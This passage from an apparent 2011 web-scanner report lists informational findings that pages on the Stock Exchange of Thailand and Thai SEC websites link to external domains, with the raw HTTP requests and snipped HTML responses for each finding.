Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/sectorquotation.do

Issue detail

The page was loaded from a URL containing a query string:

http://marketdata.set.or.th/mkt/sectorquotation.do?market=A&industry=0&sector=90&language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js

Request

GET /mkt/sectorquotation.do?market=A&industry=0&sector=90&language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 104564

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.3. http://marketdata.set.or.th/mkt/stockquotation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://marketdata.set.or.th
Path:	/mkt/stockquotation.do

Issue detail

The page was loaded from a URL containing a query string:

http://marketdata.set.or.th/mkt/stockquotation.do?language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js
http://www.sec.or.th/index.jsp?lang=en

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=5213BD46996FCAB262CBCFD14F60AD02; Path=/mkt
Content-Length: 27049

<html>
<head>
<link href="/mkt/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<span class="leftmenu"><a href="http://www.sec.or.th/index.jsp?lang=en" target="_blank" class="leftmenu">SEC Website</a>
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.4. http://www.sec.or.th/view/truehitsstat.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/truehitsstat.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.sec.or.th/view/truehitsstat.jsp?pagename=SEC%20Home%20Page

The response contains the following link to another domain:

http://hits.truehits.in.th/data/m0023906.js

Request

GET /view/truehitsstat.jsp?pagename=SEC%20Home%20Page HTTP/1.1
Host: www.sec.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sec.or.th/view/view.jsp?lang=th
Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:04:51 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Content-Length: 257
Content-Type: text/html;charset=utf-8

<style type="text/css">

</style>
<script language="javascript1.1">page="SEC Home Page";</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/m0023906.js"></script>
...[SNIP]...

13.5. http://www.sec.or.th/view/view.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.sec.or.th/view/view.jsp?lang=th

The response contains the following links to other domains:

http://twitter.com/ThaiSEC_InvesEd
http://twitter.com/ThaiSEC_News
http://www.facebook.com/pages/Thirachai-Phuvanatnaranubala/183758988324581?v=wall
http://www.gcc.go.th/
http://www.morningstarthailand.com/th/fundquickrank/default.aspx
http://www.oic.go.th/ginfo/
http://www.thaipvd.com/
http://www.thaipvd.com/thaipvd_v3/index_th.php
http://www.theacmf.org/

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:01:31 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Set-Cookie: JSESSIONID=C028BE300AB1D863D9A32BEB707CB147; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 108409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<LINK REL="SHORTCUT ICON" HREF="sec.ico">
<head>

<title>SEC, Thailand</title>

<me
...[SNIP]...
<img width="23" src="images/twitter.gif" align="absmiddle"><A href="http://twitter.com/ThaiSEC_News" target="_blank"> ............</A> | <A href="http://twitter.com/ThaiSEC_InvesEd" target="_blank"> .............................................</A>
...[SNIP]...
<td>
                                                                                           <A href="http://www.facebook.com/pages/Thirachai-Phuvanatnaranubala/183758988324581?v=wall" target="_blank">
                                                                                           <img width="23" src="icon_facebook.png" height="23" align="absmiddle" border='0'>
...[SNIP]...
<td valign="top">

<A href="http://www.theacmf.org" target="_blank"><img src="../images/acmfbanv2.gif" border="0">
...[SNIP]...
<td width="100%"><A href="http://www.thaipvd.com/thaipvd_v3/index_th.php">-

............................................................ (PVD)</A>
...[SNIP]...
<td height="21" width="100%">- <A href="http://www.morningstarthailand.com/th/fundquickrank/default.aspx" target="_blank">
                                                                                   .......................................................................................
                                                                                   </A>
...[SNIP]...
<td align="center"><a href="http://www.oic.go.th/ginfo/" target="_blank"><img src="/images/images/banner0333.gif" alt="goverment info banner" width="132" height="43" border="0" /></a><a href="http://www.gcc.go.th" target="_blank"></a>
...[SNIP]...
</a><a href="http://www.thaipvd.com/" target="_blank"></a></td>
        <td align="center"><a href="http://www.gcc.go.th" target="_blank"><img src="/images/images/1111.jpg" alt="GCC1111 banner" width="132" height="43" border="0" />
...[SNIP]...
<td align="center"><a href="http://www.thaipvd.com/" target="_blank"><img src="/images/images/TH-ThaiPVD-banner1.1.gif" alt="provident fund banner" width="132" height="43" border="0" />
...[SNIP]...

13.6. http://www.set.or.th/set/eventdetail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/eventdetail.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/eventdetail.do?newsDate=1298339640000&sequence=1&id=10184&symbol=PM&language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js

Request

GET /set/eventdetail.do?newsDate=1298339640000&sequence=1&id=10184&symbol=PM&language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/xcalendar.do?language=en&country=US
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=94

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 4064

<html>
<head>

<title>The Stock Exchange of Thailand : Corporate Action Information</title>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
</head>
<body>

...[SNIP]...
<div class="addthis_toolbox addthis_default_style">
<a href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin" class="addthis_button_compact">Share</a>
...[SNIP]...
<td>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.7. http://www.set.or.th/set/memberlist.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/memberlist.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/memberlist.do?language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js
http://www.tfex.co.th/en/member/list.html

Request

GET /set/memberlist.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/xcalendar.do?language=en&country=US
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:43:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 43783

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<td><a href="http://www.tfex.co.th/en/member/list.html" target="_blank" class="leftmenu">TFEX Member List</a>
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.8. http://www.set.or.th/set/newsdetails.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=C1251254A60333D6A74A6EE27A20EAF5; Path=/set
Content-Length: 10785

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">

<title>The Stock Excha
...[SNIP]...
<div class="addthis_toolbox addthis_default_style" align="right">
<a href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin" class="addthis_button_compact">Share</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.9. http://www.set.or.th/set/newslist.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newslist.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js
http://www.tfex.co.th/tfex/todayNews.html?locale=en_US

Request

GET /set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 64319

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<td class="leftmenu"><a href="http://www.tfex.co.th/tfex/todayNews.html?locale=en_US" target="_blank" class="leftmenu">TFEX Today News</a>
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.10. http://www.set.or.th/set/newsrelease.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newsrelease.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/newsrelease.do?language=en&country=US

The response contains the following links to other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.google-analytics.com/urchin.js
http://www.moneychannel.co.th/
http://www.tfex.co.th/tfex/releasedNews.html;jsessionid=506B87DBA78A6EE85EDE591E3A51E618?locale=en_US

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=98250DBF0F80A8A183DFC98113CEF009; Path=/set
Content-Length: 25475

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
<td class="leftmenu"><a href="http://www.tfex.co.th/tfex/releasedNews.html;jsessionid=506B87DBA78A6EE85EDE591E3A51E618?locale=en_US" class="leftmenu" target="_blank">TFEX Release</a>
...[SNIP]...
<td valign="top" class="leftmenu"><a href="http://www.moneychannel.co.th/" class="leftmenu" target="_blank">Money Channel</a>
...[SNIP]...

  <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.11. http://www.set.or.th/set/oppdaybyperiod.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/oppdaybyperiod.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US

The response contains the following links to other domains:

http://dcs-digital.com/setweb/ondemandnew.php?onid=364
http://dcs-digital.com/setweb/ondemandnew.php?onid=365
http://dcs-digital.com/setweb/ondemandnew.php?onid=366
http://dcs-digital.com/setweb/ondemandnew.php?onid=370
http://dcs-digital.com/setweb/ondemandnew.php?onid=371
http://dcs-digital.com/setweb/ondemandnew.php?onid=372
http://dcs-digital.com/setweb/ondemandnew.php?onid=374
http://dcs-digital.com/setweb/ondemandnew.php?onid=375
http://dcs-digital.com/setweb/ondemandnew.php?onid=376
http://dcs-digital.com/setweb/ondemandnew.php?onid=377
http://dcs-digital.com/setweb/ondemandnew.php?onid=378
http://dcs-digital.com/setweb/ondemandnew.php?onid=379
http://dcs-digital.com/setweb/ondemandnew.php?onid=380
http://dcs-digital.com/setweb/ondemandnew.php?onid=381
http://dcs-digital.com/setweb/ondemandnew.php?onid=382
http://dcs-digital.com/setweb/ondemandnew.php?onid=383
http://dcs-digital.com/setweb/ondemandnew.php?onid=384
http://dcs-digital.com/setweb/ondemandnew.php?onid=385
http://dcs-digital.com/setweb/ondemandnew.php?onid=386
http://dcs-digital.com/setweb/ondemandnew.php?onid=387
http://dcs-digital.com/setweb/ondemandnew.php?onid=388
http://dcs-digital.com/setweb/ondemandnew.php?onid=391
http://dcs-digital.com/setweb/ondemandnew.php?onid=392
http://dcs-digital.com/setweb/ondemandnew.php?onid=393
http://dcs-digital.com/setweb/ondemandnew.php?onid=395
http://dcs-digital.com/setweb/ondemandnew.php?onid=396
http://dcs-digital.com/setweb/ondemandnew.php?onid=397
http://dcs-digital.com/setweb/ondemandnew.php?onid=399
http://dcs-digital.com/setweb/ondemandnew.php?onid=400
http://dcs-digital.com/setweb/ondemandnew.php?onid=401
http://dcs-digital.com/setweb/ondemandnew.php?onid=405
http://dcs-digital.com/setweb/ondemandnew.php?onid=406
http://dcs-digital.com/setweb/ondemandnew.php?onid=407
http://dcs-digital.com/setweb/ondemandnew.php?onid=408
http://dcs-digital.com/setweb/ondemandnew.php?onid=409
http://dcs-digital.com/setweb/ondemandnew.php?onid=410
http://dcs-digital.com/setweb/ondemandnew.php?onid=411
http://dcs-digital.com/setweb/ondemandnew.php?onid=412
http://dcs-digital.com/setweb/ondemandnew.php?onid=413
http://dcs-digital.com/setweb/ondemandnew.php?onid=414
http://dcs-digital.com/setweb/ondemandnew.php?onid=415
http://dcs-digital.com/setweb/ondemandnew.php?onid=416
http://dcs-digital.com/setweb/ondemandnew.php?onid=417
http://dcs-digital.com/setweb/ondemandnew.php?onid=418
http://dcs-digital.com/setweb/ondemandnew.php?onid=420
http://dcs-digital.com/setweb/ondemandnew.php?onid=421
http://dcs-digital.com/setweb/ondemandnew.php?onid=422
http://dcs-digital.com/setweb/ondemandnew.php?onid=424
http://dcs-digital.com/setweb/ondemandnew.php?onid=425
http://dcs-digital.com/setweb/ondemandnew.php?onid=428
http://dcs-digital.com/setweb/ondemandnew.php?onid=429
http://dcs-digital.com/setweb/ondemandnew.php?onid=430
http://dcs-digital.com/setweb/ondemandnew.php?onid=431
http://dcs-digital.com/setweb/ondemandnew.php?onid=432
http://dcs-digital.com/setweb/ondemandnew.php?onid=433
http://dcs-digital.com/setweb/ondemandnew.php?onid=434
http://dcs-digital.com/setweb/ondemandnew.php?onid=435
http://dcs-digital.com/setweb/ondemandnew.php?onid=436
http://dcs-digital.com/setweb/ondemandnew.php?onid=437
http://dcs-digital.com/setweb/ondemandnew.php?onid=438
http://dcs-digital.com/setweb/ondemandnew.php?onid=439
http://dcs-digital.com/setweb/ondemandnew.php?onid=440
http://dcs-digital.com/setweb/ondemandnew.php?onid=441
http://dcs-digital.com/setweb/ondemandnew.php?onid=442
http://dcs-digital.com/setweb/ondemandnew.php?onid=443
http://hits.truehits.in.th/data/c0002486.js
http://portal.settrade.com/C17_ResearchList.jsp
http://portal.settrade.com/ContentManager/images/icon_new.gif
http://s7.addthis.com/js/250/addthis_widget.js
http://s7.addthis.com/static/btn/v2/lg-share-en.gif
http://www.addthis.com/bookmark.php?v=250&username=setwebadmin
http://www.dcs-digital.com/setweb/index.php
http://www.dcs-digital.com/setweb/ondemand.php?onid=448
http://www.dcs-digital.com/setweb/ondemandnew.php?onid=445
http://www.dcs-digital.com/setweb/ondemandnew.php?onid=446
http://www.dcs-digital.com/setweb/ondemandnew.php?onid=447
http://www.google-analytics.com/urchin.js
http://www.hooninside.com/
http://www.kaohoon.com/
http://www.manager.co.th/
http://www.moneychannel.co.th/
http://www.moneymartthai.com/
http://www.thunhoon.com/home/
http://www.youtube.com/settrade

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 113070

<html>
<head>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" type="text/css">
<link href="/menuFile/menu.
...[SNIP]...
</span> 8 Jun 2011) <img src="http://portal.settrade.com/ContentManager/images/icon_new.gif" width="34" height="14"></div>
...[SNIP]...
<div align="center"><a href="http://www.dcs-digital.com/setweb/index.php" target="_blank"><img src="/images/company/apple2.jpg" alt="Click to show Live Opportunity Day Webcast" width="230" border="0">
...[SNIP]...
<div align="center"><a href="http://www.youtube.com/settrade" target="_blank"><img src="/images/company/youtube1.jpg" width="78" height="78" border="0">
...[SNIP]...
<td>
<a href="http://www.kaohoon.com" target="_blank"><img src="/images/company/kaohun.jpg" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.moneychannel.co.th" target="_blank"><img src="/images/company/green logo.jpg" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.thunhoon.com/home/" target="_blank"><img src="/images/company/thunhoonlogo.gif" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.moneymartthai.com" target="_blank"><img src="/images/company/moneymart-nobg.gif" width="60"border="0">
...[SNIP]...
<td align="center">
<a href="http://www.hooninside.com" target="_blank"><img src="/images/company/hooninside.jpg" width="60"border="0">
...[SNIP]...
<td align="center">
<a href="http://www.manager.co.th" target="_blank"><img src="/images/company/astv_mngr.png" width="60"border="0">
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=384"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=406"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=371"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=376"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=374"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=412"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=391"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=422"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=397"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=396"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=421"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=441"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=424"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=445"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=430"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=386"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif" >
...[SNIP]...
